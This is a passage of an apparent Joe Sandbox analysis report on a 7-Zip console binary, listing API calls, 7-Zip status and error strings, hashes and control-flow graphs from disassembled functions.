                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$free$wcscmp
                                                                • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                • API String ID: 1252877886-1892825451
                                                                • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                • Instruction ID: 4a32cce8377689d714047cf16e735a085f0a20aab7f602feb133414a83ce1ac6
                                                                • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                • Instruction Fuzzy Hash: 0852E2723086D1A7DB29CF25E1903EEBB61F3A9744F884026DB9907B16DB79D5B8C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeSecurityPrivilege
                                                                • API String ID: 1313864721-2333288578
                                                                • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                • Instruction ID: 2674aaf1357d0aa46e051871185d8e9c27eab0f506249faf68ad87a967c7dc03
                                                                • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                • Instruction Fuzzy Hash: C1114276204F44D2DA00DB62FD983AAB3A7FBD4781F940516EA8B47A94CF3CD555C710
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 0011AC84
                                                                • OpenProcessToken.ADVAPI32 ref: 0011AC95
                                                                • LookupPrivilegeValueW.ADVAPI32 ref: 0011ACA9
                                                                • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0011F928), ref: 0011ACE0
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0011F928), ref: 0011ACEA
                                                                • CloseHandle.KERNELBASE ref: 0011ACFA
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID:
                                                                • API String ID: 3398352648-0
                                                                • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                • Instruction ID: 2baeee92401946e6dfcc3845c11900c2c6409db8a08f77b905990a13e5537f04
                                                                • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                • Instruction Fuzzy Hash: 0F012D72615A81C7DB108FB4E8847DA6761F7C4B96F945139EB4A87A54CF38C48A8B40
                                                                APIs
                                                                  • Part of subcall function 0011794C: FindClose.KERNELBASE ref: 0011795E
                                                                • FindFirstFileW.KERNELBASE ref: 001179BA
                                                                  • Part of subcall function 0011339C: free.MSVCRT ref: 001133D7
                                                                  • Part of subcall function 0011339C: memmove.MSVCRT(00000000,?,?,00000000,001110A8), ref: 001133F2
                                                                • FindFirstFileW.KERNELBASE ref: 001179FA
                                                                • free.MSVCRT ref: 00117A08
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: Find$FileFirstfree$Closememmove
                                                                • String ID:
                                                                • API String ID: 2921071498-0
                                                                • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                • Instruction ID: a24b7812c528055ac478d825c074b9ffae57904fc4f282dcd3a009312f6232e2
                                                                • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                • Instruction Fuzzy Hash: 1D213C76208A8086CB25DF24F8403AD6771F79A7B8F544320EAB9477D8DF38CA89C700
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                • API String ID: 0-2438533581
                                                                • Opcode ID: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
                                                                • Instruction ID: 0d94bc930030f348a3195867a7b421fe06e01f4402ef687fc9a58125be442c0d
                                                                • Opcode Fuzzy Hash: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
                                                                • Instruction Fuzzy Hash: 2F038332248A9092CB38EB25F4906EEB761F7D6BC0F554122E79E47B25DF79C8A5C700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1016 15950d-159510 1017 159516-159529 call 11ed74 1016->1017 1018 159a40-159a8e call 112130 1016->1018 1024 159820-159828 1017->1024 1025 15952f-159537 1017->1025 1028 159a90-159aa0 call 113314 1018->1028 1029 159aa2 1018->1029 1026 1599e4-1599ee 1024->1026 1027 15982e-15983f call 1578a8 1024->1027 1030 159557-1595d5 call 153230 call 113208 1025->1030 1031 159539-159541 1025->1031 1032 159a20-159a3f _CxxThrowException 1026->1032 1033 1599f0-159a1b call 112300 fputs * 2 call 112300 1026->1033 1048 159841-159845 1027->1048 1049 15984c-15994d call 156990 call 112bc8 call 137880 call 112bc8 call 112cdc call 156c04 1027->1049 1037 159aa5-159ac8 call 11b8f0 call 112130 1028->1037 1029->1037 1055 1595e5 1030->1055 1056 1595d7-1595df 1030->1056 1031->1030 1036 159543-159552 call 113518 1031->1036 1032->1018 1033->1032 1036->1030 1058 159adc 1037->1058 1059 159aca-159ada call 113314 1037->1059 1048->1049 1101 159980-1599df free * 5 call 156a20 1049->1101 1102 15994f 1049->1102 1061 1595e8-159631 call 113404 call 15780c 1055->1061 1056->1055 1060 1595e1-1595e3 1056->1060 1065 159adf-159c8b call 11b8f0 call 112130 1058->1065 1059->1065 1060->1061 1079 159633-159637 1061->1079 1080 15963e-15964d 1061->1080 1091 159c8d-159c98 call 157414 1065->1091 1092 159c9a 1065->1092 1079->1080 1083 159663 1080->1083 1084 15964f-159657 1080->1084 1085 15966b-15972c call 113404 call 156990 call 112bc8 1083->1085 1084->1083 1088 159659-159661 1084->1088 1117 15972f call 1499b8 1085->1117 1088->1085 1094 159c9d-159ca8 1091->1094 1092->1094 1099 159cb4-159d77 call 113404 1094->1099 1100 159caa-159cb3 1094->1100 1115 159d83-159e8a call 1571ec call 113404 call 11ef70 call 113208 call 136be0 1099->1115 1116 159d79-159d7d 1099->1116 1100->1099 1113 15a5ad-15a5b5 1101->1113 1105 159953-159969 1102->1105 1110 15997b-15997e 1105->1110 1111 15996b-159976 free * 2 1105->1111 1110->1101 1110->1105 1111->1110 1118 15a5c5-15a5c8 1113->1118 1119 15a5b7-15a5be 1113->1119 1159 159ed2-159f44 call 135458 1115->1159 1160 159e8c-159eb4 call 136e08 1115->1160 1116->1115 1121 159734-15973f 1117->1121 1124 15a5e7-15a603 free 1118->1124 1125 15a5ca-15a5e6 _CxxThrowException 1118->1125 1119->1118 1122 15a5c0 1119->1122 1128 159741-15974b call 15b1c8 1121->1128 1129 159750-159798 call 156c04 1121->1129 1130 15a5c0 call 1566a8 1122->1130 1126 15a605 1124->1126 1127 15a626-15a637 free call 13a13c 1124->1127 1125->1124 1132 15a609-15a624 free 1126->1132 1137 15a63c-15a675 call 157080 call 11182c call 157f50 1127->1137 1128->1129 1142 1597cb-15981b free * 3 call 156a20 free call 15b310 1129->1142 1143 15979a 1129->1143 1130->1118 1132->1127 1132->1132 1164 15a677 1137->1164 1165 15a6a8-15a6c9 free 1137->1165 1142->1113 1147 15979e-1597b4 1143->1147 1148 1597c6-1597c9 1147->1148 1149 1597b6-1597c1 free * 2 1147->1149 1148->1142 1148->1147 1149->1148 1168 159f49-159f53 1159->1168 1160->1159 1170 159eb6-159ed1 _CxxThrowException 1160->1170 1169 15a67b-15a691 1164->1169 1171 159f55-159f5b call 15b1c8 1168->1171 1172 159f60-159f68 1168->1172 1173 15a6a3-15a6a6 1169->1173 1174 15a693-15a69e free * 2 1169->1174 1170->1159 1171->1172 1176 159fbd-159fca 1172->1176 1177 159f6a-159f74 1172->1177 1173->1165 1173->1169 1174->1173 1180 15a02c-15a033 1176->1180 1181 159fcc-159fcf call 112300 1176->1181 1178 159f76-159fac call 112300 fputs call 112300 call 112320 call 112300 1177->1178 1179 159fb1-159fb9 1177->1179 1178->1179 1179->1176 1183 15a035-15a03a 1180->1183 1184 15a063-15a06a 1180->1184 1190 159fd4-159fdc 1181->1190 1183->1184 1187 15a03c-15a05e fputs call 1126a0 call 112300 1183->1187 1188 15a06c-15a071 1184->1188 1189 15a09e-15a0a1 1184->1189 1187->1184 1191 15a114-15a11b 1188->1191 1195 15a077-15a099 fputs call 1126a0 call 112300 1188->1195 1189->1191 1192 15a0a3-15a0aa 1189->1192 1190->1180 1196 159fde-15a027 fputs call 1126a0 call 112300 fputs call 1126a0 call 112300 1190->1196 1197 15a11d-15a122 1191->1197 1198 15a15c-15a15f 1191->1198 1199 15a0d3-15a0da 1192->1199 1200 15a0ac-15a0ce fputs call 1126a0 call 112300 1192->1200 1195->1189 1196->1180 1205 15a124-15a133 call 112300 1197->1205 1206 15a161 1197->1206 1198->1206 1210 15a16c-15a16f 1198->1210 1199->1191 1209 15a0dc-15a0eb call 112300 1199->1209 1200->1199 1205->1206 1232 15a135-15a157 fputs call 1126a0 call 112300 1205->1232 1206->1210 1209->1191 1233 15a0ed-15a10f fputs call 1126a0 call 112300 1209->1233 1220 15a175-15a17c 1210->1220 1221 15a320-15a50a free * 2 call 136b58 free call 157968 1210->1221 1228 15a2e7-15a2f6 call 112300 1220->1228 1229 15a182-15a189 1220->1229 1265 15a53d-15a559 free 1221->1265 1266 15a50c 1221->1266 1228->1221 1243 15a2f8-15a31f fputs call 1126a0 call 112300 1228->1243 1229->1228 1235 15a18f-15a192 1229->1235 1232->1198 1233->1191 1235->1221 1241 15a198-15a1a3 1235->1241 1247 15a1d5-15a1de 1241->1247 1248 15a1a5-15a1cd fputs call 1126a0 call 112300 1241->1248 1243->1221 1250 15a1e0-15a1e3 1247->1250 1251 15a1f3-15a223 fputs call 1126a0 call 112300 1247->1251 1248->1247 1250->1251 1257 15a1e5-15a1ed 1250->1257 1262 15a275-15a2c3 fputs call 1126a0 call 112300 fputs call 1126a0 call 112300 1251->1262 1280 15a225-15a270 fputs call 1126a0 call 112300 fputs call 1126a0 call 112300 1251->1280 1257->1251 1257->1262 1292 15a2c8-15a2cb 1262->1292 1272 15a58c-15a599 free 1265->1272 1273 15a55b 1265->1273 1271 15a510-15a526 1266->1271 1276 15a538-15a53b 1271->1276 1277 15a528-15a533 free * 2 1271->1277 1272->1113 1278 15a55f-15a575 1273->1278 1276->1265 1276->1271 1277->1276 1281 15a587-15a58a 1278->1281 1282 15a577-15a582 free * 2 1278->1282 1280->1262 1281->1272 1281->1278 1282->1281 1292->1221 1294 15a2cd-15a2e5 call 112300 call 15291c 1292->1294 1294->1221
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowfputs$fputc
                                                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                • API String ID: 1639683984-435538426
                                                                • Opcode ID: 11d01540a39dce0bb1392d162864f339a00698b2bef8d558280933a9d6caa4c8
                                                                • Instruction ID: 935f8b6e835d57d474283daf15d4a610664b70cc92447010c3f6036bf02f587f
                                                                • Opcode Fuzzy Hash: 11d01540a39dce0bb1392d162864f339a00698b2bef8d558280933a9d6caa4c8
                                                                • Instruction Fuzzy Hash: 12727C32219AC0D5DA34EF25E8903DEB3A0F795B81F844126DAAD4BB19DF3CC599CB41

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1833 159b5d-159b5f 1834 159b61-159b74 fputs call 112300 1833->1834 1835 159b79-159c1f call 15057c call 113208 call 1338e8 free 1833->1835 1834->1835 1843 159c21-159c2b call 15b1c8 1835->1843 1844 159c30-159c33 1835->1844 1843->1844 1846 159c35-159c3c 1844->1846 1847 159c54-159c8b call 15b310 call 112130 1844->1847 1846->1847 1848 159c3e-159c4e call 150994 1846->1848 1857 159c8d-159c98 call 157414 1847->1857 1858 159c9a 1847->1858 1853 159c53 1848->1853 1853->1847 1859 159c9d-159ca8 1857->1859 1858->1859 1862 159cb4-159d77 call 113404 1859->1862 1863 159caa-159cb3 1859->1863 1867 159d83-159e8a call 1571ec call 113404 call 11ef70 call 113208 call 136be0 1862->1867 1868 159d79-159d7d 1862->1868 1863->1862 1879 159ed2-159f53 call 135458 1867->1879 1880 159e8c-159eb4 call 136e08 1867->1880 1868->1867 1886 159f55-159f5b call 15b1c8 1879->1886 1887 159f60-159f68 1879->1887 1880->1879 1885 159eb6-159ed1 _CxxThrowException 1880->1885 1885->1879 1886->1887 1889 159fbd-159fca 1887->1889 1890 159f6a-159f74 1887->1890 1893 15a02c-15a033 1889->1893 1894 159fcc-159fcf call 112300 1889->1894 1891 159f76-159fac call 112300 fputs call 112300 call 112320 call 112300 1890->1891 1892 159fb1-159fb9 1890->1892 1891->1892 1892->1889 1896 15a035-15a03a 1893->1896 1897 15a063-15a06a 1893->1897 1903 159fd4-159fdc 1894->1903 1896->1897 1900 15a03c-15a05e fputs call 1126a0 call 112300 1896->1900 1901 15a06c-15a071 1897->1901 1902 15a09e-15a0a1 1897->1902 1900->1897 1904 15a114-15a11b 1901->1904 1908 15a077-15a099 fputs call 1126a0 call 112300 1901->1908 1902->1904 1905 15a0a3-15a0aa 1902->1905 1903->1893 1909 159fde-15a027 fputs call 1126a0 call 112300 fputs call 1126a0 call 112300 1903->1909 1910 15a11d-15a122 1904->1910 1911 15a15c-15a15f 1904->1911 1912 15a0d3-15a0da 1905->1912 1913 15a0ac-15a0ce fputs call 1126a0 call 112300 1905->1913 1908->1902 1909->1893 1918 15a124-15a133 call 112300 1910->1918 1919 15a161 1910->1919 1911->1919 1923 15a16c-15a16f 1911->1923 1912->1904 1922 15a0dc-15a0eb call 112300 1912->1922 1913->1912 1918->1919 1945 15a135-15a157 fputs call 1126a0 call 112300 1918->1945 1919->1923 1922->1904 1946 15a0ed-15a10f fputs call 1126a0 call 112300 1922->1946 1933 15a175-15a17c 1923->1933 1934 15a320-15a50a free * 2 call 136b58 free call 157968 1923->1934 1941 15a2e7-15a2f6 call 112300 1933->1941 1942 15a182-15a189 1933->1942 1978 15a53d-15a559 free 1934->1978 1979 15a50c 1934->1979 1941->1934 1956 15a2f8-15a31f fputs call 1126a0 call 112300 1941->1956 1942->1941 1948 15a18f-15a192 1942->1948 1945->1911 1946->1904 1948->1934 1954 15a198-15a1a3 1948->1954 1960 15a1d5-15a1de 1954->1960 1961 15a1a5-15a1cd fputs call 1126a0 call 112300 1954->1961 1956->1934 1963 15a1e0-15a1e3 1960->1963 1964 15a1f3-15a223 fputs call 1126a0 call 112300 1960->1964 1961->1960 1963->1964 1970 15a1e5-15a1ed 1963->1970 1975 15a275-15a2c3 fputs call 1126a0 call 112300 fputs call 1126a0 call 112300 1964->1975 1994 15a225-15a270 fputs call 1126a0 call 112300 fputs call 1126a0 call 112300 1964->1994 1970->1964 1970->1975 2017 15a2c8-15a2cb 1975->2017 1985 15a58c-15a5b5 free 1978->1985 1986 15a55b 1978->1986 1984 15a510-15a526 1979->1984 1989 15a538-15a53b 1984->1989 1990 15a528-15a533 free * 2 1984->1990 1998 15a5c5-15a5c8 1985->1998 1999 15a5b7-15a5be 1985->1999 1991 15a55f-15a575 1986->1991 1989->1978 1989->1984 1990->1989 1995 15a587-15a58a 1991->1995 1996 15a577-15a582 free * 2 1991->1996 1994->1975 1995->1985 1995->1991 1996->1995 2004 15a5e7-15a603 free 1998->2004 2005 15a5ca-15a5e6 _CxxThrowException 1998->2005 1999->1998 2002 15a5c0 call 1566a8 1999->2002 2002->1998 2006 15a605 2004->2006 2007 15a626-15a637 free call 13a13c 2004->2007 2005->2004 2012 15a609-15a624 free 2006->2012 2016 15a63c-15a675 call 157080 call 11182c call 157f50 2007->2016 2012->2007 2012->2012 2031 15a677 2016->2031 2032 15a6a8-15a6c9 free 2016->2032 2017->1934 2020 15a2cd-15a2e5 call 112300 call 15291c 2017->2020 2020->1934 2034 15a67b-15a691 2031->2034 2035 15a6a3-15a6a6 2034->2035 2036 15a693-15a69e free * 2 2034->2036 2035->2032 2035->2034 2036->2035
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputcfputsfree
                                                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                • API String ID: 2822829076-727241755
                                                                • Opcode ID: 9f8d3f089e5bbee8a8fec75c9303cdb3bd7fbc97e434fa3096768bda7bab5141
                                                                • Instruction ID: 7c8b0783c73dbae761969c80973a7e404ee73c56a3b97cda1adfe043abd0c42b
                                                                • Opcode Fuzzy Hash: 9f8d3f089e5bbee8a8fec75c9303cdb3bd7fbc97e434fa3096768bda7bab5141
                                                                • Instruction Fuzzy Hash: F3224C32319AC1D1DA38EF25E8903EEB3A0F795B81F844126DAAD47B19DF38C599C701

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2649 13a180-13a1e9 GetProcAddress * 2 2650 13a214-13a22a GetProcAddress 2649->2650 2651 13a1eb-13a1fe GetProcAddress 2649->2651 2652 13a233-13a23e 2650->2652 2653 13a22c-13a22e 2650->2653 2651->2652 2654 13a200-13a20d 2651->2654 2656 13a244-13a2f0 call 113208 call 138928 2652->2656 2657 13a729 2652->2657 2655 13a72b-13a73e 2653->2655 2654->2652 2660 13a20f 2654->2660 2664 13a2f6-13a30a 2656->2664 2665 13a648 2656->2665 2657->2655 2660->2655 2667 13a31c-13a321 2664->2667 2668 13a30c-13a31a 2664->2668 2666 13a718-13a727 call 1394a8 2665->2666 2666->2655 2670 13a328-13a32b 2667->2670 2668->2670 2673 13a34a-13a350 2670->2673 2674 13a32d-13a345 call 11ae2c call 1394a8 2670->2674 2676 13a352-13a36a call 11ae2c call 1394a8 2673->2676 2677 13a36f-13a37d SysStringByteLen 2673->2677 2691 13a634-13a63d 2674->2691 2676->2691 2680 13a383-13a3e3 call 11ae2c * 2 call 113208 * 2 call 138928 2677->2680 2681 13a64d-13a65d call 11ae2c 2677->2681 2701 13a662-13a678 free * 2 2680->2701 2702 13a3e9-13a40c call 138928 2680->2702 2681->2666 2691->2656 2694 13a643 2691->2694 2694->2657 2701->2666 2705 13a412-13a424 call 139d98 2702->2705 2706 13a67d-13a693 free * 2 2702->2706 2708 13a429-13a485 call 1387a8 call 138860 2705->2708 2706->2666 2713 13a48b-13a49c 2708->2713 2714 13a698-13a6ae free * 2 2708->2714 2715 13a4ee-13a51b call 139380 2713->2715 2716 13a49e-13a4a5 2713->2716 2714->2666 2722 13a521-13a526 2715->2722 2723 13a6b0-13a6d1 free * 3 2715->2723 2717 13a4ab-13a4d9 call 1387a8 2716->2717 2724 13a4e5-13a4ec 2717->2724 2725 13a4db-13a4de 2717->2725 2726 13a541-13a564 call 139380 2722->2726 2727 13a528-13a53f call 1398d4 2722->2727 2723->2666 2724->2715 2724->2717 2725->2724 2733 13a6d3-13a6f4 free * 3 2726->2733 2734 13a56a-13a57e call 13a034 2726->2734 2732 13a583-13a5b7 call 138860 2727->2732 2738 13a6f6-13a715 free * 3 2732->2738 2739 13a5bd-13a5c0 2732->2739 2733->2666 2734->2732 2738->2666 2740 13a5c2-13a5ca 2739->2740 2741 13a5cf-13a5e4 call 112130 2739->2741 2740->2741 2744 13a5e6-13a5f6 call 139af0 2741->2744 2745 13a5f8 2741->2745 2747 13a5fb-13a62f call 11b8f0 free * 3 call 1394a8 2744->2747 2745->2747 2747->2691
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AddressProc
                                                                • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                • API String ID: 190572456-3984264347
                                                                • Opcode ID: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
                                                                • Instruction ID: 554ad3921f5416035eaaeed460ee461871c617f5708a51032287028415cd89e0
                                                                • Opcode Fuzzy Hash: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
                                                                • Instruction Fuzzy Hash: D6D18572319AC096C620EB21E8807DEB7A5FBD6780F841521EACE47B59DF7CC545CB01

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2752 1170c8-1170e4 call 117d4c 2754 1170e9-1170ec 2752->2754 2755 1170f9-117103 call 119d84 2754->2755 2756 1170ee-1170f0 2754->2756 2761 117105-117107 2755->2761 2762 11710c-117136 call 119ed8 call 113274 call 11376c 2755->2762 2756->2755 2758 1170f2-1170f4 2756->2758 2759 117449-117458 2758->2759 2761->2759 2769 117138-117141 2762->2769 2770 11715b-117175 call 113314 2762->2770 2769->2770 2772 117143-117145 2769->2772 2776 11717a-117186 call 11a170 2770->2776 2774 117147 2772->2774 2775 11714c-117155 2772->2775 2777 1173f1-1173fe free 2774->2777 2775->2770 2780 117188-117195 CreateDirectoryW 2776->2780 2781 1171aa-1171ac 2776->2781 2777->2759 2782 117360-117364 2780->2782 2783 11719b-1171a4 GetLastError 2780->2783 2784 1171b2-1171d2 call 113208 call 11a7ec 2781->2784 2785 11727d-117286 GetLastError 2781->2785 2786 117366-117379 call 119ab0 2782->2786 2787 1173c9-1173e1 free * 2 2782->2787 2783->2781 2783->2785 2808 117273-117278 free 2784->2808 2809 1171d8-1171e7 CreateDirectoryW 2784->2809 2789 1172e4-1172ed GetLastError 2785->2789 2790 117288-1172b5 call 117d28 call 113208 call 117ebc 2785->2790 2800 117381 2786->2800 2801 11737b-11737f 2786->2801 2787->2759 2792 1173e3-1173ee free 2789->2792 2793 1172f3-117301 call 11376c 2789->2793 2823 1172b7-1172c4 free 2790->2823 2824 1172c6-1172db free 2790->2824 2792->2777 2806 117432-117447 free * 2 2793->2806 2807 117307-117309 2793->2807 2805 117385-1173a3 call 113460 call 116c84 2800->2805 2801->2805 2835 1173a5-1173a9 2805->2835 2836 1173ad-1173c4 free * 2 2805->2836 2806->2759 2807->2806 2813 11730f-117316 2807->2813 2808->2785 2814 117356-11735b free 2809->2814 2815 1171ed-1171f6 GetLastError 2809->2815 2818 117318-11731c 2813->2818 2819 11732c-117332 2813->2819 2814->2782 2820 117207-117230 call 117d28 call 113208 call 117ebc 2815->2820 2821 1171f8-117202 free 2815->2821 2826 117400-117417 free * 2 2818->2826 2827 117322-117326 2818->2827 2828 117419-117430 free * 2 2819->2828 2829 117338-11733c 2819->2829 2841 117232-11724a free * 2 2820->2841 2842 11724f-117271 free * 2 2820->2842 2821->2789 2823->2789 2831 1172e0-1172e2 2824->2831 2826->2759 2827->2819 2827->2826 2828->2759 2829->2776 2833 117342-117351 2829->2833 2831->2782 2831->2789 2833->2776 2835->2786 2838 1173ab 2835->2838 2836->2759 2838->2787 2841->2789 2842->2831
                                                                APIs
                                                                  • Part of subcall function 00117D4C: GetFileAttributesW.KERNELBASE ref: 00117D6E
                                                                  • Part of subcall function 00117D4C: GetFileAttributesW.KERNEL32 ref: 00117DA5
                                                                  • Part of subcall function 00117D4C: free.MSVCRT ref: 00117DB2
                                                                • free.MSVCRT ref: 001173F6
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
